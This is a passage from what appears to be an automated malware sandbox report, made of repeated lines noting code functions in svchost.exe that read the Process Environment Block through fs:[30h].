Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]	2_2_03BC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]	2_2_03BC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]	2_2_03BC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6E284 mov eax, dword ptr fs:[00000030h]	2_2_03B6E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6E284 mov eax, dword ptr fs:[00000030h]	2_2_03B6E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB0283 mov eax, dword ptr fs:[00000030h]	2_2_03BB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB0283 mov eax, dword ptr fs:[00000030h]	2_2_03BB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB0283 mov eax, dword ptr fs:[00000030h]	2_2_03BB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B402E1 mov eax, dword ptr fs:[00000030h]	2_2_03B402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B402E1 mov eax, dword ptr fs:[00000030h]	2_2_03B402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B402E1 mov eax, dword ptr fs:[00000030h]	2_2_03B402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_03B3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_03B3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_03B3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_03B3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_03B3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2823B mov eax, dword ptr fs:[00000030h]	2_2_03B2823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C0625D mov eax, dword ptr fs:[00000030h]	2_2_03C0625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]	2_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]	2_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]	2_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]	2_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]	2_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]	2_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]	2_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]	2_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]	2_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]	2_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]	2_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]	2_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B34260 mov eax, dword ptr fs:[00000030h]	2_2_03B34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B34260 mov eax, dword ptr fs:[00000030h]	2_2_03B34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B34260 mov eax, dword ptr fs:[00000030h]	2_2_03B34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2826B mov eax, dword ptr fs:[00000030h]	2_2_03B2826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2A250 mov eax, dword ptr fs:[00000030h]	2_2_03B2A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B36259 mov eax, dword ptr fs:[00000030h]	2_2_03B36259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BEA250 mov eax, dword ptr fs:[00000030h]	2_2_03BEA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BEA250 mov eax, dword ptr fs:[00000030h]	2_2_03BEA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB8243 mov eax, dword ptr fs:[00000030h]	2_2_03BB8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB8243 mov ecx, dword ptr fs:[00000030h]	2_2_03BB8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]	2_2_03BB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]	2_2_03BB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]	2_2_03BB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]	2_2_03BB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h]	2_2_03B2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h]	2_2_03B2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h]	2_2_03B2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C061E5 mov eax, dword ptr fs:[00000030h]	2_2_03C061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B70185 mov eax, dword ptr fs:[00000030h]	2_2_03B70185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BEC188 mov eax, dword ptr fs:[00000030h]	2_2_03BEC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BEC188 mov eax, dword ptr fs:[00000030h]	2_2_03BEC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD4180 mov eax, dword ptr fs:[00000030h]	2_2_03BD4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD4180 mov eax, dword ptr fs:[00000030h]	2_2_03BD4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B601F8 mov eax, dword ptr fs:[00000030h]	2_2_03B601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]	2_2_03BAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]	2_2_03BAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_03BAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]	2_2_03BAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]	2_2_03BAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF61C3 mov eax, dword ptr fs:[00000030h]	2_2_03BF61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF61C3 mov eax, dword ptr fs:[00000030h]	2_2_03BF61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B60124 mov eax, dword ptr fs:[00000030h]	2_2_03B60124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C04164 mov eax, dword ptr fs:[00000030h]	2_2_03C04164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C04164 mov eax, dword ptr fs:[00000030h]	2_2_03C04164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDA118 mov ecx, dword ptr fs:[00000030h]	2_2_03BDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]	2_2_03BDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]	2_2_03BDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]	2_2_03BDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF0115 mov eax, dword ptr fs:[00000030h]	2_2_03BF0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]	2_2_03BDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]	2_2_03BDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]	2_2_03BDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]	2_2_03BDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]	2_2_03BDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]	2_2_03BDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]	2_2_03BDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]	2_2_03BDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]	2_2_03BDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]	2_2_03BDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2C156 mov eax, dword ptr fs:[00000030h]	2_2_03B2C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC8158 mov eax, dword ptr fs:[00000030h]	2_2_03BC8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B36154 mov eax, dword ptr fs:[00000030h]	2_2_03B36154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B36154 mov eax, dword ptr fs:[00000030h]	2_2_03B36154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]	2_2_03BC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]	2_2_03BC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC4144 mov ecx, dword ptr fs:[00000030h]	2_2_03BC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]	2_2_03BC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]	2_2_03BC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF60B8 mov eax, dword ptr fs:[00000030h]	2_2_03BF60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF60B8 mov ecx, dword ptr fs:[00000030h]	2_2_03BF60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B280A0 mov eax, dword ptr fs:[00000030h]	2_2_03B280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC80A8 mov eax, dword ptr fs:[00000030h]	2_2_03BC80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3208A mov eax, dword ptr fs:[00000030h]	2_2_03B3208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2C0F0 mov eax, dword ptr fs:[00000030h]	2_2_03B2C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B720F0 mov ecx, dword ptr fs:[00000030h]	2_2_03B720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_03B2A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B380E9 mov eax, dword ptr fs:[00000030h]	2_2_03B380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB60E0 mov eax, dword ptr fs:[00000030h]	2_2_03BB60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB20DE mov eax, dword ptr fs:[00000030h]	2_2_03BB20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC6030 mov eax, dword ptr fs:[00000030h]	2_2_03BC6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2A020 mov eax, dword ptr fs:[00000030h]	2_2_03B2A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2C020 mov eax, dword ptr fs:[00000030h]	2_2_03B2C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]	2_2_03B4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]	2_2_03B4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]	2_2_03B4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]	2_2_03B4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB4000 mov ecx, dword ptr fs:[00000030h]	2_2_03BB4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]	2_2_03BD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]	2_2_03BD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]	2_2_03BD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]	2_2_03BD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]	2_2_03BD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]	2_2_03BD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]	2_2_03BD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]	2_2_03BD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5C073 mov eax, dword ptr fs:[00000030h]	2_2_03B5C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B32050 mov eax, dword ptr fs:[00000030h]	2_2_03B32050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB6050 mov eax, dword ptr fs:[00000030h]	2_2_03BB6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B307AF mov eax, dword ptr fs:[00000030h]	2_2_03B307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE47A0 mov eax, dword ptr fs:[00000030h]	2_2_03BE47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD678E mov eax, dword ptr fs:[00000030h]	2_2_03BD678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B347FB mov eax, dword ptr fs:[00000030h]	2_2_03B347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B347FB mov eax, dword ptr fs:[00000030h]	2_2_03B347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B527ED mov eax, dword ptr fs:[00000030h]	2_2_03B527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B527ED mov eax, dword ptr fs:[00000030h]	2_2_03B527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B527ED mov eax, dword ptr fs:[00000030h]	2_2_03B527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BBE7E1 mov eax, dword ptr fs:[00000030h]	2_2_03BBE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3C7C0 mov eax, dword ptr fs:[00000030h]	2_2_03B3C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB07C3 mov eax, dword ptr fs:[00000030h]	2_2_03BB07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6273C mov eax, dword ptr fs:[00000030h]	2_2_03B6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6273C mov ecx, dword ptr fs:[00000030h]	2_2_03B6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6273C mov eax, dword ptr fs:[00000030h]	2_2_03B6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAC730 mov eax, dword ptr fs:[00000030h]	2_2_03BAC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6C720 mov eax, dword ptr fs:[00000030h]	2_2_03B6C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6C720 mov eax, dword ptr fs:[00000030h]	2_2_03B6C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B30710 mov eax, dword ptr fs:[00000030h]	2_2_03B30710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B60710 mov eax, dword ptr fs:[00000030h]	2_2_03B60710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6C700 mov eax, dword ptr fs:[00000030h]	2_2_03B6C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B38770 mov eax, dword ptr fs:[00000030h]	2_2_03B38770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]	2_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]	2_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]	2_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]	2_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]	2_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]	2_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]	2_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]	2_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]	2_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]	2_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]	2_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]	2_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B30750 mov eax, dword ptr fs:[00000030h]	2_2_03B30750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BBE75D mov eax, dword ptr fs:[00000030h]	2_2_03BBE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72750 mov eax, dword ptr fs:[00000030h]	2_2_03B72750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72750 mov eax, dword ptr fs:[00000030h]	2_2_03B72750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB4755 mov eax, dword ptr fs:[00000030h]	2_2_03BB4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6674D mov esi, dword ptr fs:[00000030h]	2_2_03B6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6674D mov eax, dword ptr fs:[00000030h]	2_2_03B6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6674D mov eax, dword ptr fs:[00000030h]	2_2_03B6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B666B0 mov eax, dword ptr fs:[00000030h]	2_2_03B666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6C6A6 mov eax, dword ptr fs:[00000030h]	2_2_03B6C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B34690 mov eax, dword ptr fs:[00000030h]	2_2_03B34690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B34690 mov eax, dword ptr fs:[00000030h]	2_2_03B34690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]	2_2_03BAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]	2_2_03BAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]	2_2_03BAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]	2_2_03BAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB06F1 mov eax, dword ptr fs:[00000030h]	2_2_03BB06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB06F1 mov eax, dword ptr fs:[00000030h]	2_2_03BB06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_03B6A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6A6C7 mov eax, dword ptr fs:[00000030h]	2_2_03B6A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4E627 mov eax, dword ptr fs:[00000030h]	2_2_03B4E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B66620 mov eax, dword ptr fs:[00000030h]	2_2_03B66620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B68620 mov eax, dword ptr fs:[00000030h]	2_2_03B68620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3262C mov eax, dword ptr fs:[00000030h]	2_2_03B3262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72619 mov eax, dword ptr fs:[00000030h]	2_2_03B72619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAE609 mov eax, dword ptr fs:[00000030h]	2_2_03BAE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]	2_2_03B4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]	2_2_03B4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]	2_2_03B4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]	2_2_03B4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]	2_2_03B4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]	2_2_03B4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]	2_2_03B4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B62674 mov eax, dword ptr fs:[00000030h]	2_2_03B62674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF866E mov eax, dword ptr fs:[00000030h]	2_2_03BF866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF866E mov eax, dword ptr fs:[00000030h]	2_2_03BF866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6A660 mov eax, dword ptr fs:[00000030h]	2_2_03B6A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6A660 mov eax, dword ptr fs:[00000030h]	2_2_03B6A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4C640 mov eax, dword ptr fs:[00000030h]	2_2_03B4C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B545B1 mov eax, dword ptr fs:[00000030h]	2_2_03B545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B545B1 mov eax, dword ptr fs:[00000030h]	2_2_03B545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB05A7 mov eax, dword ptr fs:[00000030h]	2_2_03BB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB05A7 mov eax, dword ptr fs:[00000030h]	2_2_03BB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB05A7 mov eax, dword ptr fs:[00000030h]	2_2_03BB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6E59C mov eax, dword ptr fs:[00000030h]	2_2_03B6E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B32582 mov eax, dword ptr fs:[00000030h]	2_2_03B32582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B32582 mov ecx, dword ptr fs:[00000030h]	2_2_03B32582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B64588 mov eax, dword ptr fs:[00000030h]	2_2_03B64588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03B5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03B5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03B5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03B5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03B5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03B5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03B5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03B5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B325E0 mov eax, dword ptr fs:[00000030h]	2_2_03B325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6C5ED mov eax, dword ptr fs:[00000030h]	2_2_03B6C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6C5ED mov eax, dword ptr fs:[00000030h]	2_2_03B6C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B365D0 mov eax, dword ptr fs:[00000030h]	2_2_03B365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6A5D0 mov eax, dword ptr fs:[00000030h]	2_2_03B6A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6A5D0 mov eax, dword ptr fs:[00000030h]	2_2_03B6A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6E5CF mov eax, dword ptr fs:[00000030h]	2_2_03B6E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6E5CF mov eax, dword ptr fs:[00000030h]	2_2_03B6E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]	2_2_03B40535
